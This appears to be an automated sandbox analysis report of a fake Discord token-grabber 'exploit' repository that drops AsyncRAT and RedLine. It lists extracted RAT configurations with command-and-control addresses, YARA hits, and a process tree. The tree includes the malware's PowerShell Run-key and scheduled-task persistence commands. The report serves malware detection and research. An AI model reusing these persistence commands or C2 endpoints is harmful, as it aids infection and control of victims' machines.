asyncrat | hxxps://github[.]com/RydeinGG/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022/tree/main/Discord%20Image%20Token%20Password%20Grabber%20Exploit%20Cve%202022

Analysis

max time kernel
44s
max time network
130s
platform
windows10-1703_x64
resource
win10-20220901-en
resource tags

arch:x64arch:x86image:win10-20220901-enlocale:en-usos:windows10-1703-x64system
submitted
04-11-2022 20:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/RydeinGG/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022/tree/main/Discord%20Image%20Token%20Password%20Grabber%20Exploit%20Cve%202022

Score

10^/10

asyncrat redline defendersmartscren securityhealthservic system guard runtime windowsdefendersmarttscreen infostealer rat upx

Malware Config

Extracted

Family

asyncrat

Version

1.0.7

Botnet

WindowsDefenderSmarttScreen

217.64.31.3:9742

Mutex

WindowsDefenderSmarttScreen

Attributes

delay
1
install
false
install_file
WindowsDefenderSmarttScreen.exe
install_folder
%AppData%

aes.plain

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

System Guard Runtime

85.105.88.221:2531

Mutex

System Guard Runtime

Attributes

delay
3
install
false
install_file
System Guard Runtime
install_folder
%AppData%

aes.plain

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

SecurityHealthServic

20.8.122.174:31682

Mutex

SecurityHealthServic

Attributes

delay
3
install
false
install_file
SecurityHealthService
install_folder
%AppData%

aes.plain

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

DefenderSmartScren

217.64.31.3:8437

Mutex

DefenderSmartScren

Attributes

delay
3
install
false
install_file
SecurityHealtheurvice.exe
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/5880-1818-0x000000000041932E-mapping.dmp	family_redline

Async RAT payload 10 IoCs

rat

Processes:

resource	yara_rule
behavioral1/memory/6004-1258-0x0000000005490000-0x00000000054A2000-memory.dmp	asyncrat
behavioral1/memory/6104-1630-0x000000000040D0EE-mapping.dmp	asyncrat
behavioral1/memory/4240-1817-0x000000000040D10E-mapping.dmp	asyncrat
behavioral1/memory/3876-1811-0x000000000040D06E-mapping.dmp	asyncrat
behavioral1/memory/6104-2005-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral1/memory/5152-2163-0x000000000040D0DE-mapping.dmp	asyncrat
behavioral1/memory/4240-2245-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral1/memory/3876-2248-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral1/memory/1344-2363-0x00000000004109BE-mapping.dmp	asyncrat
behavioral1/memory/4244-2420-0x00000000004109BE-mapping.dmp	asyncrat

Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

Discord Image Token Grabber_nls..scrDEFENDERFILESECURITY.EXE

pid process

4432 Discord Image Token Grabber_nls..scr
5024 DEFENDERFILESECURITY.EXE

pid	process
4432	Discord Image Token Grabber_nls..scr
5024	DEFENDERFILESECURITY.EXE

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\DEFENDERFILESECURITY.EXE	upx
C:\Users\Admin\AppData\Roaming\DEFENDERFILESECURITY.EXE	upx
behavioral1/memory/5024-234-0x00007FF650260000-0x00007FF6503BF000-memory.dmp	upx
behavioral1/memory/5024-236-0x00007FF650260000-0x00007FF6503BF000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Suspicious use of SetThreadContext 1 IoCs

Processes:

Discord Image Token Grabber_nls..scr

description pid process target process

PID 4432 set thread context of 956 4432 Discord Image Token Grabber_nls..scr RegAsm.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

5780 5808 WerFault.exe ab241f2.exe
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

2776 schtasks.exe
5144 schtasks.exe
5292 schtasks.exe
5760 schtasks.exe

description	pid	process	target process
PID 4432 set thread context of 956	4432	Discord Image Token Grabber_nls..scr	RegAsm.exe

pid	pid_target	process	target process
5780	5808	WerFault.exe	ab241f2.exe

pid	process
2776	schtasks.exe
5144	schtasks.exe
5292	schtasks.exe
5760	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Modifies registry class 1 IoCs

Processes:

chrome.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings	chrome.exe

Suspicious behavior: EnumeratesProcesses 16 IoCs

Processes:

chrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exe

pid	process
4628	chrome.exe
4628	chrome.exe
2844	chrome.exe
2844	chrome.exe
1396	chrome.exe
1396	chrome.exe
4584	chrome.exe
4584	chrome.exe
5024	chrome.exe
5024	chrome.exe
4292	chrome.exe
4292	chrome.exe
4724	chrome.exe
4724	chrome.exe
204	chrome.exe
204	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

Processes:

chrome.exe

pid process

2844 chrome.exe
2844 chrome.exe
2844 chrome.exe
2844 chrome.exe
2844 chrome.exe
2844 chrome.exe

Suspicious use of FindShellTrayWindow 34 IoCs

Processes:

chrome.exe

pid	process
2844	chrome.exe
2844	chrome.exe
2844	chrome.exe
2844	chrome.exe
2844	chrome.exe
2844	chrome.exe
2844	chrome.exe
2844	chrome.exe
2844	chrome.exe
2844	chrome.exe
2844	chrome.exe
2844	chrome.exe
2844	chrome.exe
2844	chrome.exe
2844	chrome.exe
2844	chrome.exe
2844	chrome.exe
2844	chrome.exe
2844	chrome.exe
2844	chrome.exe
2844	chrome.exe
2844	chrome.exe
2844	chrome.exe
2844	chrome.exe
2844	chrome.exe
2844	chrome.exe
2844	chrome.exe
2844	chrome.exe
2844	chrome.exe
2844	chrome.exe
2844	chrome.exe
2844	chrome.exe
2844	chrome.exe
2844	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

chrome.exe

pid	process
2844	chrome.exe
2844	chrome.exe
2844	chrome.exe
2844	chrome.exe
2844	chrome.exe
2844	chrome.exe
2844	chrome.exe
2844	chrome.exe
2844	chrome.exe
2844	chrome.exe
2844	chrome.exe
2844	chrome.exe
2844	chrome.exe
2844	chrome.exe
2844	chrome.exe
2844	chrome.exe
2844	chrome.exe
2844	chrome.exe
2844	chrome.exe
2844	chrome.exe
2844	chrome.exe
2844	chrome.exe
2844	chrome.exe
2844	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 2844 wrote to memory of 2856	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 2856	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 3708	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 3708	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 3708	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 3708	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 3708	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 3708	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 3708	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 3708	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 3708	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 3708	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 3708	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 3708	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 3708	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 3708	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 3708	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 3708	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 3708	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 3708	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 3708	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 3708	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 3708	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 3708	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 3708	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 3708	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 3708	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 3708	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 3708	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 3708	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 3708	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 3708	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 3708	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 3708	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 3708	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 3708	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 3708	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 3708	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 3708	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 3708	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 3708	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 3708	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 4628	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 4628	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 4656	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 4656	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 4656	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 4656	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 4656	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 4656	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 4656	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 4656	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 4656	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 4656	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 4656	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 4656	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 4656	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 4656	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 4656	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 4656	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 4656	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 4656	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 4656	2844	chrome.exe	chrome.exe
PID 2844 wrote to memory of 4656	2844	chrome.exe	chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://github.com/RydeinGG/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022/tree/main/Discord%20Image%20Token%20Password%20Grabber%20Exploit%20Cve%202022
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2844

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd0,0xd4,0xd8,0xac,0x64,0x7ffa6a6d4f50,0x7ffa6a6d4f60,0x7ffa6a6d4f70
2⤵
PID:2856

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1640,13154856714685508584,7266013677706170601,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1648 /prefetch:2
2⤵
PID:3708

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1640,13154856714685508584,7266013677706170601,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1696 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4628

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1640,13154856714685508584,7266013677706170601,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2112 /prefetch:8
2⤵
PID:4656

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,13154856714685508584,7266013677706170601,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2868 /prefetch:1
2⤵
PID:1632

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,13154856714685508584,7266013677706170601,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2836 /prefetch:1
2⤵
PID:3412

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,13154856714685508584,7266013677706170601,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4036 /prefetch:8
2⤵
PID:824

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1640,13154856714685508584,7266013677706170601,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4424 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1396

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,13154856714685508584,7266013677706170601,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4768 /prefetch:8
2⤵
PID:4244

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1640,13154856714685508584,7266013677706170601,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4284 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4584

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,13154856714685508584,7266013677706170601,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4760 /prefetch:8
2⤵
PID:4648

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,13154856714685508584,7266013677706170601,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4196 /prefetch:8
2⤵
PID:4496

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,13154856714685508584,7266013677706170601,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4216 /prefetch:8
2⤵
PID:3760

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,13154856714685508584,7266013677706170601,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4364 /prefetch:1
2⤵
PID:4772

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,13154856714685508584,7266013677706170601,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5268 /prefetch:1
2⤵
PID:3796

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1640,13154856714685508584,7266013677706170601,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5420 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5024

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1640,13154856714685508584,7266013677706170601,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5672 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4724

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1640,13154856714685508584,7266013677706170601,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5792 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4292

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1640,13154856714685508584,7266013677706170601,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4848 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:204

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,13154856714685508584,7266013677706170601,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1772 /prefetch:1
2⤵
PID:1932

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,13154856714685508584,7266013677706170601,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4872 /prefetch:1
2⤵
PID:4712

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,13154856714685508584,7266013677706170601,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4996 /prefetch:8
2⤵
PID:2304

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,13154856714685508584,7266013677706170601,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1548 /prefetch:8
2⤵
PID:2588

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,13154856714685508584,7266013677706170601,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5876 /prefetch:8
2⤵
PID:3916

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,13154856714685508584,7266013677706170601,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5992 /prefetch:8
2⤵
PID:3532

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,13154856714685508584,7266013677706170601,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5912 /prefetch:8
2⤵
PID:2860

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,13154856714685508584,7266013677706170601,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6540 /prefetch:8
2⤵
PID:3300

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,13154856714685508584,7266013677706170601,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6408 /prefetch:8
2⤵
PID:4828

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,13154856714685508584,7266013677706170601,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6012 /prefetch:8
2⤵
PID:3352

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,13154856714685508584,7266013677706170601,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4636 /prefetch:8
2⤵
PID:4408

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,13154856714685508584,7266013677706170601,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6280 /prefetch:1
2⤵
PID:4996

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,13154856714685508584,7266013677706170601,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6424 /prefetch:1
2⤵
PID:4732

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,13154856714685508584,7266013677706170601,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5424 /prefetch:8
2⤵
PID:1376

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1640,13154856714685508584,7266013677706170601,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6480 /prefetch:8
2⤵
PID:4432

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1640,13154856714685508584,7266013677706170601,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2352 /prefetch:8
2⤵
PID:2656

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,13154856714685508584,7266013677706170601,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5708 /prefetch:8
2⤵
PID:5780

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1640,13154856714685508584,7266013677706170601,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5296 /prefetch:8
2⤵
PID:5996

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1640,13154856714685508584,7266013677706170601,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=3416 /prefetch:2
2⤵
PID:1832

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4944

C:\Users\Admin\Downloads\Discord Image Token Grabber_nls..scr
"C:\Users\Admin\Downloads\Discord Image Token Grabber_nls..scr"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4432

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
2⤵
PID:956

C:\Users\Admin\AppData\Roaming\DEFENDERFILESECURITY.EXE
"C:\Users\Admin\AppData\Roaming\DEFENDERFILESECURITY.EXE"
3⤵
- Executes dropped EXE
PID:5024

C:\Windows\system32\cmd.exe
"cmd" /C C:\Users\Admin\AppData\Local\Temp\0.exe
4⤵
PID:1540

C:\Users\Admin\AppData\Local\Temp\0.exe
C:\Users\Admin\AppData\Local\Temp\0.exe
5⤵
PID:4048

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'DefenderFileSecurity';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'DefenderFileSecurity' -Value '"C:\Users\Admin\AppData\Roaming\DefenderFileSecurity\DefenderFileSecurity.exe"' -PropertyType 'String'
6⤵
PID:2764

C:\Windows\SysWOW64\cmd.exe
"cmd" /C schtasks /create /tn \DefenderFileSecurity /tr "C:\Users\Admin\AppData\Roaming\DefenderFileSecurity\DefenderFileSecurity.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
6⤵
PID:2788

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn \DefenderFileSecurity /tr "C:\Users\Admin\AppData\Roaming\DefenderFileSecurity\DefenderFileSecurity.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
7⤵
- Creates scheduled task(s)
PID:2776

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
6⤵
PID:1888

C:\Users\Admin\AppData\Roaming\SECURITYHEALTHSERVIC.EXE
"C:\Users\Admin\AppData\Roaming\SECURITYHEALTHSERVIC.EXE"
7⤵
PID:344

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
